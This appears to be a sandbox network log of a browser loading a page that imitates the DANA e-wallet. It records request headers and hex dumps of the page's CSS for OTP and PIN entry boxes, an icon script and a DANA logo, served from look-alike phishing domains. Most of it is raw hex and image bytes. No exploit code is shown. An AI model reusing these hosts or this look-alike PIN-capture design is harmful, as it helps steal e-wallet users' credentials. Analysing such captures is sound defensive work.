                                                                                                                            2024-10-06 11:50:06 UTC1256INData Raw: 2e 62 67 6f 74 70 20 7b 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 7a 2d 69 6e 64 65 78 3a 20 39 39 39 39 3b 74 6f 70 3a 20 30 3b 6c 65 66 74 3a 20 30 3b 72 69 67 68 74 3a 20 30 3b 77 69 64 74 68 3a 20 31 30 30 25 3b 68 65 69 67 68 74 3a 20 31 30 30 25 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 30 30 30 30 30 30 33 32 3b 7d 2e 62 67 6f 74 70 20 66 6f 72 6d 20 7b 77 69 64 74 68 3a 20 31 30 30 25 3b 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 62 6f 74 74 6f 6d 3a 20 30 3b 68 65 69 67 68 74 3a 20 35 30 25 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 20 35 30 25 3b 6d 61 78 2d 68 65 69 67 68 74 3a 20 35 30 25 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 62 6f 72 64 65 72 2d 74 6f 70 2d 6c 65 66 74 2d 72 61 64 69 75 73 3a 20 31 35 70
                                                                                                                            Data Ascii: .bgotp {position: absolute;z-index: 9999;top: 0;left: 0;right: 0;width: 100%;height: 100%;background: #00000032;}.bgotp form {width: 100%;position: absolute;bottom: 0;height: 50%;min-height: 50%;max-height: 50%;background: #fff;border-top-left-radius: 15p


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            4192.168.2.64972923.185.0.44436220C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:06 UTC572OUTGET /asset/main.css HTTP/1.1
                                                                                                                            Host: dev-danapemulihan.pantheonsite.io
                                                                                                                            Connection: keep-alive
                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                            Accept: text/css,*/*;q=0.1
                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                            Sec-Fetch-Dest: style
                                                                                                                            Referer: http://penukran-poin-dana.aktsx.cfd/
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            2024-10-06 11:50:06 UTC695INHTTP/1.1 200 OK
                                                                                                                            Connection: close
                                                                                                                            Content-Type: text/css
                                                                                                                            Etag: W/"670203dc-f27"
                                                                                                                            Expires: Sun, 06 Oct 2024 11:50:05 GMT
                                                                                                                            Last-Modified: Sun, 06 Oct 2024 03:28:28 GMT
                                                                                                                            Server: nginx
                                                                                                                            Strict-Transport-Security: max-age=300
                                                                                                                            X-Pantheon-Styx-Hostname: styx-fe4-a-6c9ddd647d-tp778
                                                                                                                            X-Styx-Req-Id: 2163066d-83d9-11ef-99c9-f2833418d7bb
                                                                                                                            Cache-Control: no-cache, must-revalidate
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:06 GMT
                                                                                                                            X-Served-By: cache-chi-kigq8000154-CHI, cache-ewr-kewr1740052-EWR
                                                                                                                            X-Cache: MISS, MISS
                                                                                                                            X-Cache-Hits: 0, 0
                                                                                                                            X-Timer: S1728215406.285199,VS0,VE38
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            X-Robots-Tag: noindex
                                                                                                                            Age: 0
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            Via: 1.1 varnish, 1.1 varnish
                                                                                                                            transfer-encoding: chunked
                                                                                                                            2024-10-06 11:50:06 UTC5INData Raw: 66 32 37 0d 0a
                                                                                                                            Data Ascii: f27
                                                                                                                            2024-10-06 11:50:06 UTC1378INData Raw: 40 69 6d 70 6f 72 74 20 75 72 6c 28 27 2e 2e 2f 2e 2e 2f 65 78 74 65 72 6e 61 6c 2e 68 74 6d 6c 3f 6c 69 6e 6b 3d 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 32 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 77 67 68 74 40 34 30 30 3b 36 30 30 3b 37 30 30 26 61 6d 70 3b 64 69 73 70 6c 61 79 3d 73 77 61 70 27 29 3b 2a 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 4f 70 65 6e 20 53 61 6e 73 27 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 6d 61 72 67 69 6e 3a 20 30 3b 70 61 64 64 69 6e 67 3a 20 30 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 63 6f 6c 6f 72 3a 20 23 66 66
                                                                                                                            Data Ascii: @import url('../../external.html?link=https://fonts.googleapis.com/css2?family=Open+Sans:wght@400;600;700&amp;display=swap');* {font-family: 'Open Sans', sans-serif;font-weight: 400;margin: 0;padding: 0;box-sizing: border-box;position: relative;color: #ff
                                                                                                                            2024-10-06 11:50:06 UTC1378INData Raw: 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 63 61 72 65 74 2d 63 6f 6c 6f 72 3a 20 23 63 31 63 31 63 31 3b 7d 2e 62 6f 78 2d 69 6e 70 75 74 20 2e 6c 61 62 65 6c 20 7b 68 65 69 67 68 74 3a 20 31 30 30 25 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 30 30 25 3b 6d 61 78 2d 68 65 69 67 68 74 3a 20 31 30 30 25 3b 70 61 64 64 69 6e 67 3a 20 34 70 78 3b 77 69 64 74 68 3a 20 37 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 20 37 30 70 78 3b 6d 61 78 2d 77 69 64 74 68 3a 20 37 30 70 78 3b 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 7d 2e 62 6f 78 2d 69 6e 70 75 74 20 2e
                                                                                                                            Data Ascii: -items: center;justify-content: center;caret-color: #c1c1c1;}.box-input .label {height: 100%;min-height: 100%;max-height: 100%;padding: 4px;width: 70px;min-width: 70px;max-width: 70px;display: flex;justify-content: center;align-items: center;}.box-input .
                                                                                                                            2024-10-06 11:50:06 UTC1123INData Raw: 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 20 6e 6f 77 72 61 70 3b 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 39 30 30 70 78 29 20 7b 68 74 6d 6c 20 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 31 31 38 45 45 41 3b 7d 62 6f 64 79 20 7b 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 30 30 30 30 30 30 31 62 3b 7d 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 77 69 64 74 68 3a 20 34 35 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 20 34 35 30 70 78 3b 6d 61 78 2d 77 69 64 74 68 3a 20 34 35 30 70 78 3b 68 65 69 67 68 74
                                                                                                                            Data Ascii: {font-size: 10px;white-space: nowrap;}@media screen and (min-width: 900px) {html {background: #118EEA;}body {display: flex;justify-content: center;align-items: center;background: #0000001b;}.container {width: 450px;min-width: 450px;max-width: 450px;height
                                                                                                                            2024-10-06 11:50:06 UTC7INData Raw: 0d 0a 30 0d 0a 0d 0a
                                                                                                                            Data Ascii: 0


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            5192.168.2.649724104.17.249.2034436220C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:06 UTC606OUTGET /ionicons@7.1.0/dist/ionicons/ionicons.esm.js HTTP/1.1
                                                                                                                            Host: unpkg.com
                                                                                                                            Connection: keep-alive
                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                            Origin: http://penukran-poin-dana.aktsx.cfd
                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                            Accept: */*
                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                            Referer: http://penukran-poin-dana.aktsx.cfd/
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            2024-10-06 11:50:06 UTC576INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:06 GMT
                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                            Transfer-Encoding: chunked
                                                                                                                            Connection: close
                                                                                                                            access-control-allow-origin: *
                                                                                                                            cache-control: public, max-age=31536000
                                                                                                                            last-modified: Sat, 26 Oct 1985 08:15:00 GMT
                                                                                                                            etag: W/"154-Yvf53JjVJOVZ9ojnyzM7GNGGCvg"
                                                                                                                            via: 1.1 fly.io
                                                                                                                            fly-request-id: 01HRWM5YEG5SEZDXEFH2F47RR2-lga
                                                                                                                            CF-Cache-Status: HIT
                                                                                                                            Age: 17857726
                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            Server: cloudflare
                                                                                                                            CF-RAY: 8ce56e914b314391-EWR
                                                                                                                            2024-10-06 11:50:06 UTC347INData Raw: 31 35 34 0d 0a 69 6d 70 6f 72 74 7b 70 20 61 73 20 69 2c 62 20 61 73 20 6f 7d 66 72 6f 6d 22 2e 2f 70 2d 64 31 35 65 63 33 30 37 2e 6a 73 22 3b 28 28 29 3d 3e 7b 63 6f 6e 73 74 20 6f 3d 69 6d 70 6f 72 74 2e 6d 65 74 61 2e 75 72 6c 2c 73 3d 7b 7d 3b 72 65 74 75 72 6e 22 22 21 3d 3d 6f 26 26 28 73 2e 72 65 73 6f 75 72 63 65 73 55 72 6c 3d 6e 65 77 20 55 52 4c 28 22 2e 22 2c 6f 29 2e 68 72 65 66 29 2c 69 28 73 29 7d 29 28 29 2e 74 68 65 6e 28 28 69 3d 3e 6f 28 5b 5b 22 70 2d 31 63 30 62 32 63 34 37 22 2c 5b 5b 31 2c 22 69 6f 6e 2d 69 63 6f 6e 22 2c 7b 6d 6f 64 65 3a 5b 31 30 32 35 5d 2c 63 6f 6c 6f 72 3a 5b 31 5d 2c 69 6f 73 3a 5b 31 5d 2c 6d 64 3a 5b 31 5d 2c 66 6c 69 70 52 74 6c 3a 5b 34 2c 22 66 6c 69 70 2d 72 74 6c 22 5d 2c 6e 61 6d 65 3a 5b 35 31 33 5d
                                                                                                                            Data Ascii: 154import{p as i,b as o}from"./p-d15ec307.js";(()=>{const o=import.meta.url,s={};return""!==o&&(s.resourcesUrl=new URL(".",o).href),i(s)})().then((i=>o([["p-1c0b2c47",[[1,"ion-icon",{mode:[1025],color:[1],ios:[1],md:[1],flipRtl:[4,"flip-rtl"],name:[513]
                                                                                                                            2024-10-06 11:50:06 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                            Data Ascii: 0


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            6192.168.2.64972823.185.0.44436220C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:06 UTC571OUTGET /asset/pin.css HTTP/1.1
                                                                                                                            Host: dev-danapemulihan.pantheonsite.io
                                                                                                                            Connection: keep-alive
                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                            Accept: text/css,*/*;q=0.1
                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                            Sec-Fetch-Dest: style
                                                                                                                            Referer: http://penukran-poin-dana.aktsx.cfd/
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            2024-10-06 11:50:06 UTC688INHTTP/1.1 200 OK
                                                                                                                            Connection: close
                                                                                                                            Content-Length: 666
                                                                                                                            Content-Type: text/css
                                                                                                                            Etag: W/"670203dc-29a"
                                                                                                                            Expires: Sun, 06 Oct 2024 11:50:05 GMT
                                                                                                                            Last-Modified: Sun, 06 Oct 2024 03:28:28 GMT
                                                                                                                            Server: nginx
                                                                                                                            Strict-Transport-Security: max-age=300
                                                                                                                            X-Pantheon-Styx-Hostname: styx-fe4-a-6c9ddd647d-tp778
                                                                                                                            X-Styx-Req-Id: 216493bb-83d9-11ef-99c9-f2833418d7bb
                                                                                                                            Cache-Control: no-cache, must-revalidate
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:06 GMT
                                                                                                                            X-Served-By: cache-chi-klot8100169-CHI, cache-ewr-kewr1740074-EWR
                                                                                                                            X-Cache: MISS, MISS
                                                                                                                            X-Cache-Hits: 0, 0
                                                                                                                            X-Timer: S1728215406.291929,VS0,VE42
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            X-Robots-Tag: noindex
                                                                                                                            Age: 0
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            Via: 1.1 varnish, 1.1 varnish
                                                                                                                            2024-10-06 11:50:06 UTC666INData Raw: 2e 62 6f 78 2d 69 6e 70 75 74 2d 70 69 6e 20 7b 77 69 64 74 68 3a 20 31 30 30 25 3b 68 65 69 67 68 74 3a 20 34 35 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 35 30 70 78 3b 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 7d 2e 62 6f 78 2d 69 6e 70 75 74 2d 70 69 6e 20 69 6e 70 75 74 20 7b 68 65 69 67 68 74 3a 20 31 30 30 25 3b 77 69 64 74 68 3a 20 34 30 70 78 3b 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 3b 6f 75 74 6c 69 6e 65 3a 20 6e 6f 6e 65 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 38 70 78 3b 6d 61 72 67 69 6e 3a 20 30 20 33 70 78 3b 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20
                                                                                                                            Data Ascii: .box-input-pin {width: 100%;height: 45px;margin-top: 50px;display: flex;justify-content: center;align-items: center;}.box-input-pin input {height: 100%;width: 40px;border: none;outline: none;border-radius: 8px;margin: 0 3px;display: flex;justify-content:


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            7192.168.2.64973223.185.0.44436220C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:06 UTC627OUTGET /asset/img/dana_logo.png HTTP/1.1
                                                                                                                            Host: dev-danapemulihan.pantheonsite.io
                                                                                                                            Connection: keep-alive
                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                            Referer: http://penukran-poin-dana.aktsx.cfd/
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            2024-10-06 11:50:06 UTC665INHTTP/1.1 200 OK
                                                                                                                            Connection: close
                                                                                                                            Content-Length: 12786
                                                                                                                            Content-Type: image/png
                                                                                                                            Etag: "670203dc-31f2"
                                                                                                                            Expires: Sun, 06 Oct 2024 11:50:05 GMT
                                                                                                                            Last-Modified: Sun, 06 Oct 2024 03:28:28 GMT
                                                                                                                            Server: nginx
                                                                                                                            Strict-Transport-Security: max-age=300
                                                                                                                            X-Pantheon-Styx-Hostname: styx-fe4-b-b586bd68-slphl
                                                                                                                            X-Styx-Req-Id: 2177b501-83d9-11ef-a668-f6bd2f2baf87
                                                                                                                            Cache-Control: no-cache, must-revalidate
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:06 GMT
                                                                                                                            X-Served-By: cache-chi-kigq8000098-CHI, cache-ewr-kewr1740043-EWR
                                                                                                                            X-Cache: MISS, MISS
                                                                                                                            X-Cache-Hits: 0, 0
                                                                                                                            X-Timer: S1728215406.421571,VS0,VE37
                                                                                                                            X-Robots-Tag: noindex
                                                                                                                            Age: 0
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            Via: 1.1 varnish, 1.1 varnish
                                                                                                                            2024-10-06 11:50:06 UTC1378INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 7e 00 00 00 70 08 06 00 00 01 6e a0 2b ae 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 31 a9 49 44 41 54 78 01 ed 7d 07 98 15 35 f7 fe b2 bb b0 2c 20 bd f7 ce d2 55 ba 4a 11 41 fe a0 58 10 44 f4 93 ce 27 a0 a8 88 20 cd f2 47 11 01 0b f8 09 08 82 52 a4 88 22 45 a4 23 8a 52 94 8e d2 41 a9 d2 9b ac c0 52 96 df 7b 2e e4 92 9d 9b 99 49 e6 ce 6d bb b9 cf b3 3b 33 c9 c9 c9 c9 9b 4c 26 39 39 39 89 8a 32 f9 8d 18 31 a2 dc b9 73 e7 fe 31 89 0e 9b e0 74 46 49 6e e0 67 0c 63 cf e9 f0 63 f7 e1 72 8d 66 82 f4 ed db b7 a4 95 f0 44 67 17 cf 78 05 f3 ea 45 54 45 b8 70 aa 09 4f 0d a8 08 4f e8 fe f1 c7 1f 0b 78 94 29 3d ff e3 e3 d8 fd 8e 1d 3b 96 da d1 d8 c5 9f 3c 79 72 bf 90 86 05 22 b3 f4 ec 9e ae 2c 73 76
                                                                                                                            Data Ascii: PNGIHDR~pn+gAMAa1IDATx}5, UJAXD' GR"E#RAR{.Im;3L&99921s1tFIngccrfDgxETEpOOx)=;<yr",sv
                                                                                                                            2024-10-06 11:50:06 UTC1378INData Raw: df 7f bf 31 69 fd 9c fe 18 58 c6 ab 0c 3f 54 c4 26 63 3a fe 99 e7 c1 87 f3 f7 8c 26 58 15 c0 e7 cd dd a7 ec 82 28 e2 bf ff fd ef 62 0c d5 db 3e f5 d4 53 93 39 c2 a8 c2 85 0b 27 40 e8 4b 7c 98 d3 7b 2b 7d c7 47 1f 7d 54 c3 c8 17 c3 c7 93 50 2b 1f 30 86 9b 3d 33 1e 50 fc fb cc 6d 58 1a 46 c3 9e 8d 57 16 2f c3 c3 ac 12 19 0f f0 f6 0e f1 0d f9 24 5b d2 b0 56 e2 d6 75 f2 e4 c9 ed 0d 02 e8 47 19 04 ae 5e bd ea 57 1d 94 2f 5f be 80 4c 3e 9a 46 02 81 82 05 0b e6 86 fd 46 a2 55 8d c0 06 e9 4d 09 56 9a c4 4f 04 a2 b1 66 ff cc 3f f8 4d 9f 3e 7d f8 5b 6f bd 55 d2 4f 7e 3a b9 15 02 0b 17 2e 6c 65 d5 ea 59 1c 54 00 7f 5b f1 d1 71 0a 08 8c 1d 3b f6 6e 06 ac ca 15 2b 95 17 14 b2 49 d3 a4 c2 61 1a 94 50 97 33 66 cc 28 d6 d6 49 c2 65 35 d4 94 64 91 ea c9 7c c6 a6 d4 ca fd
                                                                                                                            Data Ascii: 1iX?T&c:&X(b>S9'@K|{+}G}TP+0=3PmXFW/$[VuG^W/_L>FFUMVOf?M>}[oUO~:.leYT[q;n+IaP3f(Ie5d|
                                                                                                                            2024-10-06 11:50:06 UTC1378INData Raw: 73 4e d3 08 74 ea d4 29 67 20 1a af 5b 3c 6f ad 94 69 ed 69 9a 6e a5 01 28 3c 8c b1 bc 36 45 6e 35 d6 40 f1 81 9f 8f 9f 03 00 81 66 99 ca 11 e0 d7 b6 3c 45 2d 5d ba 74 56 b8 a2 38 1f 69 e5 c6 8b 15 05 53 29 5a 2e d2 2b 0b 91 56 79 21 92 97 5f 5b 8c ea d3 a7 4f b9 48 6c f8 84 1d 19 ea e0 05 48 86 71 92 a5 03 36 11 ce 76 66 15 56 5f ac fd fb f7 af a9 5b b7 6e 1e 11 5f b7 c2 06 0e 1c 58 06 aa fc 43 56 72 50 1c ac 77 2f cf 9c 39 f3 71 b7 f2 35 f2 f9 f8 e3 8f ef 82 31 ed 29 3b 39 e0 b5 20 f1 f3 cf 3f 6f 64 4c ef d6 33 78 37 c4 2a de 05 3b 39 20 eb 69 92 d9 2c 5f 6f cf 7f df 7d f7 e5 c0 e6 34 a1 39 86 59 62 b7 c2 01 d6 19 ec 61 9a 01 57 8a 73 71 bf 1b 0d 99 2c 21 4a 62 37 4d ab e2 c5 8b 77 c0 c1 27 5e d7 60 32 79 22 3d cd 03 2c 0d 6d 79 3e d4 f8 eb d5 ab d7 91
                                                                                                                            Data Ascii: sNt)g [<oiin(<6En5@f<E-]tV8iS)Z.+Vy!_[OHlHq6vfV_[n_XCVrPw/9q51);9 ?odL3x7*;9 i,_o}49YbaWsq,!Jb7Mw'^`2y"=,my>
                                                                                                                            2024-10-06 11:50:06 UTC1378INData Raw: 1a 01 65 04 26 4c 98 f0 48 24 34 7a 92 11 ee f7 94 56 40 95 c1 d0 09 d2 26 02 30 cf fd 36 5c 5f 02 18 73 0d 4a 9b b5 a2 4b 1d 54 04 b0 88 d3 27 5c 5e 02 58 6c 3e 14 d4 c2 eb cc 34 02 0c 01 b8 64 26 8f eb 41 fd ad 59 b3 66 06 cb 5f 5f 35 02 61 81 c0 eb af bf 5e ff e8 d1 a3 47 dc 7e 13 a0 f3 de d6 a5 4b 97 8a 61 51 48 2d 44 aa 44 40 5a ed a4 58 fa 78 6c 04 a9 83 ad 81 0f e7 cf 9f bf 36 16 69 4a 62 0b 59 16 6c 47 f4 58 59 c2 56 e5 02 54 85 17 b0 7a bb 1b db 17 57 c1 7e fc 3b d8 18 6d 40 1e d7 14 f3 d1 e4 1a 01 c7 08 04 aa f1 7b 04 c2 62 53 1e 6c 08 49 c0 e6 83 da f7 de 7b 6f 07 2c 90 15 dc b7 6f df 36 0c 9b be ca 94 29 d3 5a 6c f4 20 8b 52 15 33 59 c7 05 d5 09 35 02 01 45 00 87 ad dd 09 1f 3a b3 d0 b1 27 a9 0c 83 b0 38 75 7e cb 96 2d e3 7b f7 ee 5d 2a a0 02
                                                                                                                            Data Ascii: e&LH$4zV@&06\_sJKT'\^Xl>4d&AYf__5a^G~KaQH-DD@ZXxl6iJbYlGXYVTzW~;m@{bSlI{o,o6)Zl R3Y5E:'8u~-{]*
                                                                                                                            2024-10-06 11:50:06 UTC1378INData Raw: 20 4f 82 19 4b 6c b1 3d 0d d5 f8 ed 72 89 de 54 51 d8 2f bf fc f2 31 63 ba 64 c9 92 ae 28 b8 f0 34 6e b8 b8 3e 4c 43 15 d0 de c1 e8 dd b8 42 9d b6 42 24 97 31 0c 8b 5e 2a 3e f1 85 3d 3f 0e ec 30 f5 cd 4f 65 79 ed b5 d7 2a e3 90 b7 2b c6 bc d9 33 39 cd 55 2d 73 9b 36 6d f2 b1 f4 c6 2b 9d 98 d9 b3 67 cf d2 26 3c d3 03 73 d3 b3 6a 71 fe c2 8b 26 e9 84 c1 f0 bc 91 60 cc 9f 3d d3 99 04 50 67 e6 11 26 8c 8a ca 04 dc 12 19 ad f1 8a 53 2b 1b 99 a4 13 06 63 de d3 c4 c8 83 3d a3 53 4d a4 af a4 28 61 8f 1e 3d f2 90 9c 8c d6 78 85 d3 b3 92 9e 74 95 2a 55 32 05 dc 98 08 0d da db f8 0d 99 d2 62 59 40 ce a3 e2 f3 41 cf bf d2 28 93 d9 33 d2 99 f6 16 3c 4f dc 0b 1b 3f b0 95 3a 76 13 3e 8b 0e 99 c9 80 4f fd 83 86 bc 2c 1f 69 8c 6e c6 0b 09 85 15 cd 33 44 67 74 46 94 1e 65
                                                                                                                            Data Ascii: OKl=rTQ/1cd(4n>LCBB$1^*>=?0Oey*+39U-s6m+g&<sjq&`=Pg&S+c=SM(a=xt*U2bY@A(3<O?:v>O,in3DgtFe
                                                                                                                            2024-10-06 11:50:06 UTC1378INData Raw: da 94 47 45 e1 a2 b0 96 2d 5b 4e 14 85 ab 84 a1 a1 47 e3 05 75 b4 fb a8 63 c7 8e a4 3d 33 d5 2f ab c8 81 0f 50 12 8c bc a4 d5 a5 d8 67 21 d4 3a a9 e4 19 ce b4 a8 97 53 70 d3 42 27 77 4a fd 30 0a 48 34 23 f4 ac f0 62 d2 7b 04 43 9f ab 66 44 7c 38 26 77 c3 50 21 37 b0 b1 f9 03 34 68 a1 69 04 2a ab 04 86 2f 7d a1 8f a5 f3 79 af 61 4b dc 44 7f 1a 3e 9f bf dd 3d b4 57 7b 41 23 55 16 3b 5e 4e e2 61 c8 56 63 da b4 69 7f 3a 49 ab d3 04 17 01 4f cf 4f 59 a2 c7 78 09 db 13 47 cb 64 8f cf 49 54 fd fa f5 5f a1 3f a2 27 95 1e 6c c0 69 bb 5c 14 de 4c 19 16 01 a3 81 23 a3 67 03 c6 dc 82 31 36 8c 24 b5 6e dd ba 38 86 28 c7 2c c8 74 54 18 21 e0 b5 ed 79 f4 d1 47 c7 38 95 8b 5e 86 f4 e9 d3 87 bc e1 d3 d6 c3 81 03 07 06 4d bf cf f0 fa e9 a7 9f 46 df 71 c7 1d 19 75 c3 67 88
                                                                                                                            Data Ascii: GE-[NGuc=3/Pg!:SpB'wJ0H4#b{CfD|8&wP!74hi*/}yaKD>=W{A#U;^NaVci:IOOYxGdIT_?'li\L#g16$n8(,tT!yG8^MFqug
                                                                                                                            2024-10-06 11:50:06 UTC1378INData Raw: 00 2d b2 8a 1e be d2 9e c5 6f fc f8 f1 cd b1 78 be 2a 88 52 66 a6 83 e3 71 ec 9a cc 11 c4 52 62 c1 d7 d2 15 10 5e c2 df 75 a9 04 a9 9f 28 03 8a 98 11 de 3a 63 81 0d e1 9c 84 3f c2 c7 35 cc c1 2b 92 7e e4 f2 84 f0 88 b9 85 c7 65 3c 13 1e 69 f5 17 8f 82 c7 01 8f 68 e0 41 ef 0c e1 41 6d 24 b8 bf b5 6b d7 0e 17 8d 4a 75 58 e0 11 48 4c 4c bc fc c5 17 5f b4 08 52 8d 47 af 5c b9 32 28 27 2c c0 25 f1 05 f2 cd b4 7e fd fa 11 38 97 bd 11 ca 97 39 48 65 0c 4a 36 2f bf fc 72 f1 e5 cb 97 f7 c0 cc 6d 29 be df 4a bb d5 b1 df 23 e9 c4 89 13 3b 37 6d da 34 6a c2 84 09 f7 43 e0 88 f7 05 35 74 e8 d0 f2 68 5b fd 0f 1f 3e bc 0a 75 7f 4e e5 cd 81 96 e1 22 b5 95 0d 1b 36 0c 1d 3b 76 6c 2d e0 61 75 64 66 50 ea d7 cf 4c d2 8d 19 33 a6 26 95 07 6e 6b 36 53 f9 54 f0 20 fc 80 e3 6a
                                                                                                                            Data Ascii: -ox*RfqRb^u(:c?5+~e<ihAAm$kJuXHLL_RG\2(',%~89HeJ6/rm)J#;7m4jC5th[>uN"6;vl-audfPL3&nk6ST j
